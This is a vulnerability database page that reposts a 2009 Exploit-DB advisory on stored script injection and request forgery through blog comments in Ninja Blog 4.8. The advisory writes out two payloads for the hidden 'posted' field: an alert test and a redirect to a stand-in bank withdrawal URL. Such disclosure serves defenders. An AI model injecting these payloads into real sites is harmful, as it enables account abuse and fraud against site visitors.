Lucene search
K

Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection

🗓️ 19 Jan 2009 00:00:00Reported by Danny MoulesType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection affecting vendor's websit

Code
Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at https://www.push55.co.uk/index.php?s=ad&id=7

----

Due to insufficient validation of client-side data, we can inject script directly into the file-based storage used for blog comments.

When making a new comment, we simply fill the "posted" hidden field's value with...

<script>alert('xss');<script>"

...for an XSS attack OR...

<script>window.location="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory"</script>

...for a CRSF attack and otherwise submit the comment as usual.

Whenever that comment is viewed, the script is executed.

# milw0rm.com [2009-01-19]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation